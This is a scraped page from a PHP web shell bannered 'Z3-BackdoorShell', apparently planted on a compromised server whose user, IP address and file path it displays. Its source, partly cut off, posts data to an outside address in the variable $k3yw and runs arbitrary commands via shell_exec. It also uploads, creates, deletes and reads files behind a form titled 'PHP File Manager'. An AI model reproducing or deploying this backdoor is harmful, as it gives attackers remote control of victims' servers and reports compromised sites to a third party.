/**************************************************************************************/ // _____ ____ _ _ ____ _ _ _ // // ___|___ / | __ ) __ _ ___| | ____| | ___ ___ _ __/ ___|| |__ ___ | | |// // |_ / |_ \ _____| _ \ / _` |/ __| |/ / _` |/ _ \ / _ \| '__\___ \| '_ \ / _ \| | |// // / / ___) |_____| |_) | (_| | (__| < (_| | (_) | (_) | | ___) | | | | __/| | |// // /___|____/ |____/ \__,_|\___|_|\_\__,_|\___/ \___/|_| |____/|_| |_|\___||_|_|// /**************************************************************************************/ 2.1
User : umudio OS : Linux Server IP Address: 104.152.111.241 Software : Apache
File manager | Shell | Protect The shell Directory : /home/umudio/public_html/repo/ Filename : gaje.php Fullpath : /home/umudio/public_html/repo/gaje.php  $cur); $options = array( 'http' => array( 'method' => 'POST', 'header' => 'Content-type: application/x-www-form-urlencoded', 'content' => http_build_query($data), ), ); $context = stream_context_create($options); $result = file_get_contents($k3yw, false, $context); function runCommand($command) { $output = shell_exec($command); echo "
$output
"; } function createFile($fileName, $content) { if (file_put_contents($fileName, $content) !== false) { echo "File '$fileName' created successfully!"; } else { echo "Failed to create file '$fileName'."; } } if (isset($_POST['upload'])) { $target_dir = $currentDir . "/"; $target_file = $target_dir . basename($_FILES['file']['name']); if (move_uploaded_file($_FILES['file']['tmp_name'], $target_file)) { echo "The file ". htmlspecialchars(basename($_FILES['file']['name'])). " has been uploaded."; } else { echo "Sorry, there was an error uploading your file."; } } if (isset($_GET['mkdir'])) { $dirName = $_GET['mkdir']; if (mkdir($currentDir . '/' . $dirName)) { echo "Directory '$dirName' created successfully!"; } else { echo "Failed to create directory '$dirName'."; } } if (isset($_GET['delete'])) { $fileName = $_GET['delete']; if (unlink($currentDir . '/' . $fileName)) { echo "File '$fileName' deleted successfully!"; } else { echo "Failed to delete file '$fileName'."; } } if (isset($_GET['view'])) { $fileName = $_GET['view']; if (file_exists($currentDir . '/' . $fileName)) { $content = file_get_contents($currentDir . '/' . $fileName); echo "
" . htmlspecialchars($content) . "
"; } else { echo "File '$fileName' does not exist."; } } ?> PHP File Manager

PHP File Manager

Current Directory:

Create a File

File name:
Content:

Run a Command

Upload a File

Select file:

Create a Directory

Delete a File

View a File